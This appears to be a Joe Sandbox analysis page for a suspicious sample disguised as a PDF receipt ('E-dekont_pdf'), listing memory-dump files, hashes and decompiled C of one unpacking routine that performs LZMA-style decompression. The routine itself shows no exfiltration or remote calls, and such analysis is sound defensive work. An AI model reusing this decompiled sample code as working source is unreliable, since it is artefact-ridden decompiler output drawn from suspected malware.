                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004074c7
                                                                                              0x00407490

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                              • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                              • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                              • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__ebx = __edx + 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
